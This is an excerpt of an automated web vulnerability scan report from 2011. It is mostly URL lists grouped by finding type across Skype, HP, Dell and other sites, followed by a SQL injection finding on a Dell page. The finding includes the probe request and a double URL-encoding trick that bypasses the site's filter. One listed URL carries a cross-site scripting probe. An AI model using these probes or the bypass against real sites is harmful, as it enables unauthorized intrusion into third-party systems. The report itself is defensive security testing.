20.56. http://blogs.skype.com/en/education/

20.57. http://blogs.skype.com/en/mobile/

20.58. http://blogs.skype.com/en/social_good/

20.59. http://community.skype.com/t5/Deutsch/ct-p/de

20.60. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer

20.61. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

20.62. https://developer.skype.com/javascripts/jquery/extensions/jquery.cookie.js

20.63. https://developer.skype.com/silk

20.64. https://developer.skype.com/support

20.65. https://developer.skype.com/support/

20.66. http://h30187.www3.hp.com/resources/scripts/controls.js

20.67. http://h30187.www3.hp.com/resources/scripts/dragdrop.js

20.68. http://h30187.www3.hp.com/resources/scripts/widget/util.js

20.69. http://heartbeat.skype.com/

20.70. http://i.dell.com/images/global/js/lib/jquery-1.2.2e.js

20.71. http://i2.msdn.microsoft.com/Hash/8c37ae5af06d04795b740449553e275e.js

20.72. http://lwn.net/Articles/456878/

20.73. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

20.74. https://mid.live.com/si/login.aspx/x22

20.75. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

20.76. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

20.77. http://radware.trk.sodoit.com/rts.js

20.78. https://secure.skypeassets.com//i/js/skype-common.js

20.79. https://secure.skypeassets.com/i/js/skype-common.js

20.80. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html

20.81. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html

20.82. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

20.83. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html

20.84. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

20.85. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

20.86. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

20.87. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

20.88. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

20.89. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html

20.90. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

20.91. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html

20.92. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html

20.93. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

20.94. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html

20.95. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html

20.96. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110902073344.js

20.97. http://sj.wsj.net/djscript/require/j_global_slim/version/20110831104810.js

20.98. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

20.99. http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css

20.100. http://welcome.hp-ww.com/js/hpweb_soctag.js

20.101. http://www.barracudanetworks.com/ns/js/wysiwyg/wysiwyg.js

20.102. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

20.103. http://www.cymphonix.com/2011-shaping-demo-sem.html

20.104. http://www.cymphonix.com/scripts/scriptaculous/controls.js

20.105. http://www.cymphonix.com/scripts/scriptaculous/dragdrop.js

20.106. http://www.google.com/search

20.107. http://www.hellobar.com/hellobar-5462-3430.js

20.108. http://www.hp.com/cma/metrics/survey/learningcenter.js

20.109. http://www.hp.com/cma/metrics/survey/lib/sup_class2.js

20.110. http://www.hp.com/cma/metrics/survey/na_num_clicks.js

20.111. http://www.imperva.com/js/lightbox.js

20.112. http://www.imperva.com/js/prototype.js

20.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

20.114. http://www.radware.com/javascript/formRtns.js

20.115. http://www.skype.com/i/js/skype-common.js

20.116. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi

20.117. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/

20.118. http://www.skype.com/intl/en/features/allfeatures/skype-wifi

20.119. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/

20.120. http://www.skypeassets.com/i/js/skype-common.js

20.121. https://www.trustwave.com/

20.122. https://www.trustwave.com/js/jquery/hoverIntent.js

20.123. https://www.trustwave.com/web-application-firewall/

20.124. http://www.wallstreetoasis.com/files/js/js_0ab1e26fe2caa039c043f8d9dcf49447.js

21. Private IP addresses disclosed

21.1. http://connect.facebook.net/en_US/all.js

21.2. https://connect.facebook.net/en_US/all.js

21.3. http://www.facebook.com/extern/login_status.php

21.4. http://www.facebook.com/plugins/fan.php

21.5. http://www.facebook.com/plugins/like.php

21.6. http://www.facebook.com/plugins/like.php

22. Credit card numbers disclosed

22.1. http://googleads.g.doubleclick.net/pagead/ads

22.2. http://lwn.net/Articles/456878/

23. Robots.txt file

23.1. http://6a.typepad.com/.services/content

23.2. http://ad.adtegrity.net/pixel

23.3. http://ad.turn.com/server/pixel.htm

23.4. http://ad.yieldmanager.com/pixel

23.5. https://adwords.google.com/um/StartNewLogin

23.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

23.7. http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0

23.8. http://apps.sapha.com/appshandler.php

23.9. http://apr.lijit.com///www/delivery/ajs.php

23.10. http://cdn.turn.com/server/ddc.htm

23.11. http://ce.lijit.com/merge

23.12. http://community.skype.com/t5/English/ct-p/English

23.13. http://content-cdn.dell.com/css/dyn/CSSC.aspx

23.14. http://content.dell.com/us/en/business/security-network.aspx

23.15. http://crl.geotrust.com/crls/secureca.crl

23.16. http://dce.sapha.com/engine.php

23.17. http://dell-bsd_us.baynote.net/baynote/tags3/policy

23.18. http://dell-global.baynote.net/baynote/tags3/common

23.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

23.20. http://eas.apm.emediate.eu/eas

23.21. http://ecustomeropinions.com/survey/survey.php

23.22. http://embed.technorati.com/linkcount

23.23. http://fls.doubleclick.net/activityi

23.24. https://fls.doubleclick.net/activityi

23.25. http://gacela.eu/bb/mrcsrc/getpixel.php

23.26. https://h10078.www1.hp.com/

23.27. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

23.28. http://h20158.www2.hp.com/gms/ks/sq/

23.29. http://h20180.www2.hp.com/apps/Nav

23.30. http://h20219.www2.hp.com/services/us/en/business-it-services.html

23.31. http://h30261.www3.hp.com/phoenix.zhtml

23.32. http://h30434.www3.hp.com/psg

23.33. http://h30499.www3.hp.com/hpeb

23.34. http://h30501.www3.hp.com/hpsws

23.35. http://h30507.www3.hp.com/

23.36. http://h41174.www4.hp.com/4/hp/us/en/hho/post_sales/products/hub/|/r3990/|apps/nav/1684651975@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

23.37. http://h71028.www7.hp.com/enterprise/us/en/solutions/large-enterprise-business-solutions.html

23.38. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html

23.39. http://i.dell.com/images/global/general/doc-ready.gif

23.40. http://img-cdn.mediaplex.com/0/12309/universal.html

23.41. http://js.microsoft.com/library/svy/sto/broker-config.js

23.42. http://met1.hp.com/b/ss/hphqsearch/1/H.22.1/s31933527498040

23.43. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852

23.44. http://microsoftsto.112.2o7.net/b/ss/msstomsdn,msstomsdnonly,msstomsdnmktenus,msstolibrollup,msstolibwebdev,msstouberie/1/H.20.3/s6623076066840

23.45. http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx

23.46. http://now.eloqua.com/visitor/v200/svrGP.aspx

23.47. http://nsm.dell.com/b/ss/dellglobalonline/1/H.23.3/s3547971131745

23.48. http://pagead2.googlesyndication.com/pagead/imgad

23.49. http://pixel.33across.com/ps/

23.50. http://pixel.mathtag.com/event/js

23.51. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif

23.52. http://r.turn.com/r/beacon

23.53. http://rotation.linuxnewmedia.com/www/delivery/ajs.php

23.54. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYwdMDIIDWAyoo4-kAAP______________________________________________PzIJwekAAP____8D

23.55. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.56. http://samples.msdn.microsoft.com/workshop/samples/author/dhtml/refs/insertScript_2.htm

23.57. http://search2.skype.com/search/search.cgi

23.58. https://secure.skype.com/account/login

23.59. https://secure.skypeassets.com/i/css/turbo/full.css

23.60. http://shop.skype.com/apps

23.61. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

23.62. https://support.skype.com/

23.63. http://sync.mathtag.com/sync/img

23.64. http://tag.admeld.com/ad/js/179/lijit/728x90/ros

23.65. http://translate.googleapis.com/translate_a/l

23.66. http://ui.skype.com/ui/0/5.5.0.114./en/getlatestversion

23.67. http://vap1den1.lijit.com/www/delivery/lg.php

23.68. http://vap1iad1.lijit.com/www/delivery/lg.php

23.69. http://vap1iad2.lijit.com/www/delivery/lg.php

23.70. http://vap1sfo1.lijit.com/www/delivery/lg.php

23.71. http://vap2den1.lijit.com/www/delivery/lg.php

23.72. http://vap2iad1.lijit.com/www/delivery/lg.php

23.73. http://vap3den1.lijit.com/www/delivery/lg.php

23.74. http://welcome.hp-ww.com/country/us/eng/js/hub/metrics.js

23.75. http://www-cdn.dell.com/content/public/menu.aspx

23.76. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

23.77. http://www.google.com/adsense/search/ads.js

23.78. http://www.googleadservices.com/pagead/aclk

23.79. http://www.hp.com/search/

23.80. http://www.ibm.com/favicon.ico

23.81. http://www.imiclk.com/cgi/r.cgi

23.82. http://www.imperva.com/products/wsc_web-application-firewall.html

23.83. http://www.lijit.com/delivery/fp

23.84. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

23.85. http://www.radware.com/Resources/AppWallSolution.aspx

23.86. http://www.skype.com/go/registration

23.87. http://www.skypeassets.com/i/images/icons/favicon.ico

23.88. https://www.trustwave.com/web-application-firewall/

23.89. http://www.vodburner.com/affland.php

23.90. http://www.w3.org/TR/html5/dom.html

23.91. http://www.w3schools.com/js/js_ex_dom.asp

24. Cacheable HTTPS response

24.1. https://chat1.us.dell.com/netagent/cimlogin.aspx

24.2. https://developer.skype.com/

24.3. https://developer.skype.com/accessories

24.4. https://developer.skype.com/certification

24.5. https://developer.skype.com/certification/accessories

24.6. https://developer.skype.com/certification/certified-list

24.7. https://developer.skype.com/certification/odm-program

24.8. https://developer.skype.com/login

24.9. https://developer.skype.com/public/skypekit

24.10. https://developer.skype.com/public/skypekit/

24.11. https://developer.skype.com/signup

24.12. https://developer.skype.com/silk

24.13. https://developer.skype.com/skypekit/reference/cpp/index.html

24.14. https://developer.skype.com/skypekit/reference/java/index.html

24.15. https://developer.skype.com/skypekit/reference/python/index.html

24.16. https://developer.skype.com/support

24.17. https://developer.skype.com/support/

24.18. https://fls.doubleclick.net/activityi

24.19. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

24.20. https://secure.skype.com/login

24.21. https://support.skype.com/de/

24.22. https://support.skype.com/en-us/

24.23. https://support.skype.com/en-us/category/ABOUT_SKYPE/

24.24. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/

24.25. https://support.skype.com/en-us/category/BANK_TRANSFERS/

24.26. https://support.skype.com/en-us/category/BIZ_VERSION/

24.27. https://support.skype.com/en-us/category/BLACKBERRY/

24.28. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/

24.29. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/

24.30. https://support.skype.com/en-us/category/CALLING/

24.31. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/

24.32. https://support.skype.com/en-us/category/CALL_FORWARDING/

24.33. https://support.skype.com/en-us/category/CALL_QUALITY/

24.34. https://support.skype.com/en-us/category/CALL_TRANSFER/

24.35. https://support.skype.com/en-us/category/CONFERENCE_CALLING/

24.36. https://support.skype.com/en-us/category/CONNECTION_ISSUES/

24.37. https://support.skype.com/en-us/category/CONTACTS/

24.38. https://support.skype.com/en-us/category/CORDLESS_PHONES/

24.39. https://support.skype.com/en-us/category/CREDIT_CARDS/

24.40. https://support.skype.com/en-us/category/EXTRAS/

24.41. https://support.skype.com/en-us/category/FACEBOOK/

24.42. https://support.skype.com/en-us/category/FILE_TRANSFER/

24.43. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/

24.44. https://support.skype.com/en-us/category/GIROPAY/

24.45. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/

24.46. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

24.47. https://support.skype.com/en-us/category/MONEYBOOKERS/

24.48. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/

24.49. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/

24.50. https://support.skype.com/en-us/category/PAYMENT_PRICES/

24.51. https://support.skype.com/en-us/category/PAYPAL/

24.52. https://support.skype.com/en-us/category/PAYSAFECARD/

24.53. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/

24.54. https://support.skype.com/en-us/category/PREPAID_CARDS/

24.55. https://support.skype.com/en-us/category/PRIVACY__SECURITY/

24.56. https://support.skype.com/en-us/category/PSP/

24.57. https://support.skype.com/en-us/category/PUBLIC_CHATS/

24.58. https://support.skype.com/en-us/category/SCREEN_SHARING/

24.59. https://support.skype.com/en-us/category/SC_CONFIG/

24.60. https://support.skype.com/en-us/category/SC_GETTING_STARTED/

24.61. https://support.skype.com/en-us/category/SC_PBX/

24.62. https://support.skype.com/en-us/category/SC_REQUIREMENTS/

24.63. https://support.skype.com/en-us/category/SC_TROUBLE/

24.64. https://support.skype.com/en-us/category/SEND_MONEY/

24.65. https://support.skype.com/en-us/category/SKYPEFIND/

24.66. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/

24.67. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/

24.68. https://support.skype.com/en-us/category/SKYPE_ACCESS/

24.69. https://support.skype.com/en-us/category/SKYPE_API/

24.70. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/

24.71. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/

24.72. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/

24.73. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/

24.74. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/

24.75. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/

24.76. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/

24.77. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/

24.78. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/

24.79. https://support.skype.com/en-us/category/SKYPE_LITE/

24.80. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

24.81. https://support.skype.com/en-us/category/SKYPE_ME/

24.82. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/

24.83. https://support.skype.com/en-us/category/SKYPE_ON_AU/

24.84. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/

24.85. https://support.skype.com/en-us/category/SKYPE_ON_THREE/

24.86. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/

24.87. https://support.skype.com/en-us/category/SKYPE_PRIME/

24.88. https://support.skype.com/en-us/category/SKYPE_PRO/

24.89. https://support.skype.com/en-us/category/SKYPE_SMS/

24.90. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/

24.91. https://support.skype.com/en-us/category/SKYPE_TO_GO/

24.92. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/

24.93. https://support.skype.com/en-us/category/SM_FEATURES/

24.94. https://support.skype.com/en-us/category/SM_GETTING_STARTED/

24.95. https://support.skype.com/en-us/category/SM_MEMBERS/

24.96. https://support.skype.com/en-us/category/SM_PAYMENTS/

24.97. https://support.skype.com/en-us/category/SM_REPORTS/

24.98. https://support.skype.com/en-us/category/SUBSCRIPTIONS/

24.99. https://support.skype.com/en-us/category/TS_ACCOUNT/

24.100. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/

24.101. https://support.skype.com/en-us/category/UKASH/

24.102. https://support.skype.com/en-us/category/VIDEO/

24.103. https://support.skype.com/en-us/category/VID_CALLING/

24.104. https://support.skype.com/en-us/category/VOICEMAIL/

24.105. https://support.skype.com/en-us/category/VOUCHERS/

24.106. https://support.skype.com/en-us/category/WINDOWS_MOBILE/

24.107. https://support.skype.com/en-us/category/YANDEX_MONEY/

24.108. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

24.109. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

24.110. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

24.111. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

24.112. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

24.113. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

24.114. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

24.115. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

24.116. https://support.skype.com/en-us/glossary

24.117. https://support.skype.com/en-us/search_first/

24.118. https://support.skype.com/en/

24.119. https://support.skype.com/en/category/BANK_TRANSFERS/

24.120. https://support.skype.com/en/category/BIZ

24.121. https://support.skype.com/en/category/CALL

24.122. https://support.skype.com/en/category/CREDIT_CARDS/

24.123. https://support.skype.com/en/category/GIFT_CERTIFICATES/

24.124. https://support.skype.com/en/category/GIROPAY/

24.125. https://support.skype.com/en/category/MESSAGING

24.126. https://support.skype.com/en/category/MONEYBOOKERS/

24.127. https://support.skype.com/en/category/PAY

24.128. https://support.skype.com/en/category/PAYMENT_PRICES/

24.129. https://support.skype.com/en/category/PAYPAL/

24.130. https://support.skype.com/en/category/PAYSAFECARD/

24.131. https://support.skype.com/en/category/PREPAID_CARDS/

24.132. https://support.skype.com/en/category/PRIVACY__SECURITY/

24.133. https://support.skype.com/en/category/PROD

24.134. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE

24.135. https://support.skype.com/en/category/SUBSCRIPTIONS/

24.136. https://support.skype.com/en/category/TECH

24.137. https://support.skype.com/en/category/TS_ACCOUNT/

24.138. https://support.skype.com/en/category/UKASH/

24.139. https://support.skype.com/en/category/VID_CALL

24.140. https://support.skype.com/en/category/VOUCHERS/

24.141. https://support.skype.com/en/category/YANDEX_MONEY/

24.142. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account

24.143. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

24.144. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

24.145. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

24.146. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

24.147. https://support.skype.com/en/glossary

24.148. https://support.skype.com/en/search

24.149. https://support.skype.com/en/tips

24.150. https://www.trustwave.com/favicon.ico

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory

25.2. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass

25.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.4. http://fls.doubleclick.net/activityi

25.5. https://fls.doubleclick.net/activityi

25.6. http://h41105.www4.hp.com/m/us/en/index.xsl

25.7. http://h71028.www7.hp.com/enterprise/us/en/halo/index.html

25.8. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html

25.9. http://h71036.www7.hp.com/hho/cache/597818-0-0-225-121.html

25.10. http://i.dell.com/tlFramePage.htm

25.11. http://msite.martiniadnetwork.com/index/

25.12. http://now.eloqua.com/visitor/v200/svrGP.aspx

25.13. http://samples.msdn.microsoft.com/favicon.ico

25.14. http://tags.bluekai.com/site/4234

25.15. http://trk.etrigue.com/track.php

25.16. http://trk.roitrax.com/radware/rts.html

25.17. http://view.atdmt.com/CNT/iview/334305255/direct/01

25.18. http://view.atdmt.com/I36/iview/325171692/direct

25.19. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

25.20. http://www.vodburner.com/affland.php

25.21. http://www.w3schools.com/banners/aspallbannerframe.asp

25.22. http://www.w3schools.com/banners/aspallframe.asp

25.23. http://www.w3schools.com/js/tryit.asp

25.24. http://www.w3schools.com/js/tryit_view.asp

25.25. http://www.w3schools.com/jsref/demo_iframe.htm

25.26. http://www.w3schools.com/jsref/frame_a.htm

25.27. http://www.w3schools.com/jsref/frame_b.htm

25.28. http://www.w3schools.com/jsref/tryit.asp

25.29. http://www.w3schools.com/jsref/tryit_view.asp

26. Content type incorrectly stated

26.1. http://72d329.r.axf8.net/mr/a.gif

26.2. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js

26.3. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js

26.4. http://blogs.skype.com/comments.js

26.5. http://blogs.skype.com/en/bloggerbios.js

26.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.7. http://catrg.peer39.net/251/161/1867330751

26.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

26.9. http://cs.wsj.net/community/content/images/misc/groups/politicscapitol.25x25.png

26.10. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

26.11. http://cymphonix.app3.hubspot.com/salog.js.aspx

26.12. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax

26.13. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

26.14. http://h20180.www2.hp.com/favicon.ico

26.15. https://h41183.www4.hp.com/inflexion/scripts/lc-inflexion-lang.js

26.16. http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg

26.17. http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg

26.18. http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg

26.19. http://hplc-prod.s3.amazonaws.com/media/50483/desktops_64.jpg

26.20. http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg

26.21. http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg

26.22. http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg

26.23. http://hplc-prod.s3.amazonaws.com/media/50488/Total_care_64.jpg

26.24. http://hplc-prod.s3.amazonaws.com/media/50581/TS_600t_64.jpg

26.25. http://msite.martiniadnetwork.com/index/

26.26. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.27. http://online.wsj.com/djscript/latest/dojo/cldr/nls/en/number.js

26.28. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

26.29. http://samples.msdn.microsoft.com/favicon.ico

26.30. http://search.dell.com/public/menu.aspx

26.31. http://search2.skype.com/search/bb-ratings.cgi

26.32. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_glass_100_f6f6f6_1x400.png

26.33. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_highlight-soft_100_eeeeee_1x100.png

26.34. http://stream1d.radware.net/cdn/images/home/quicknav/ui-icons_888888_256x240.png

26.35. http://trk.etrigue.com/track.php

26.36. http://twitter.com/statuses/user_timeline.json

26.37. http://www-cdn.dell.com/content/public/menu.aspx

26.38. http://www.cgisecurity.com/.services/json-rpc

26.39. http://www.cgisecurity.com/.shared/images/atpcomment-gradient.png

26.40. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

26.41. http://www.google.com/search

26.42. http://www.jdoasis.com/sites/all/themes/wso/images/logo.jpg

26.43. http://www.skype.com/etc/segmentation.segment.js

26.44. http://www.skype.com/intl/ar/_application/content/_footer/

26.45. http://www.skype.com/intl/cs/_application/content/_footer/

26.46. http://www.skype.com/intl/da/_application/content/_footer/

26.47. http://www.skype.com/intl/de/_application/content/_footer/

26.48. http://www.skype.com/intl/en-gb/_application/content/_footer/

26.49. http://www.skype.com/intl/en-us/_application/content/_footer/

26.50. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

26.51. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

26.52. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

26.53. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

26.54. http://www.skype.com/intl/en/_application/content/_footer/

26.55. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

26.56. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

26.57. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

26.58. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

26.59. http://www.skype.com/intl/es-es/_application/content/_footer/

26.60. http://www.skype.com/intl/es/_application/content/_footer/

26.61. http://www.skype.com/intl/et/_application/content/_footer/

26.62. http://www.skype.com/intl/fi/_application/content/_footer/

26.63. http://www.skype.com/intl/fr/_application/content/_footer/

26.64. http://www.skype.com/intl/hu/_application/content/_footer/

26.65. http://www.skype.com/intl/it/_application/content/_footer/

26.66. http://www.skype.com/intl/iw/_application/content/_footer/

26.67. http://www.skype.com/intl/ja/_application/content/_footer/

26.68. http://www.skype.com/intl/ko/_application/content/_footer/

26.69. http://www.skype.com/intl/lt/_application/content/_footer/

26.70. http://www.skype.com/intl/lv/_application/content/_footer/

26.71. http://www.skype.com/intl/nl/_application/content/_footer/

26.72. http://www.skype.com/intl/no/_application/content/_footer/

26.73. http://www.skype.com/intl/pl/_application/content/_footer/

26.74. http://www.skype.com/intl/pt-br/_application/content/_footer/

26.75. http://www.skype.com/intl/pt/_application/content/_footer/

26.76. http://www.skype.com/intl/ru/_application/content/_footer/

26.77. http://www.skype.com/intl/sv/_application/content/_footer/

26.78. http://www.skype.com/intl/tr/_application/content/_footer/

26.79. http://www.skype.com/intl/zh-Hans/_application/content/_footer/

26.80. http://www.skype.com/intl/zh-Hant/_application/content/_footer/

26.81. https://www.trustwave.com/favicon.ico

26.82. http://www.vodburner.com/favicon.ico

26.83. http://www.xg4ken.com/



1. SQL injection  next
There are 49 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://accessories.us.dell.com/sna/productdetail.aspx [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25226
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:43 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:42 GMT
Connection: close

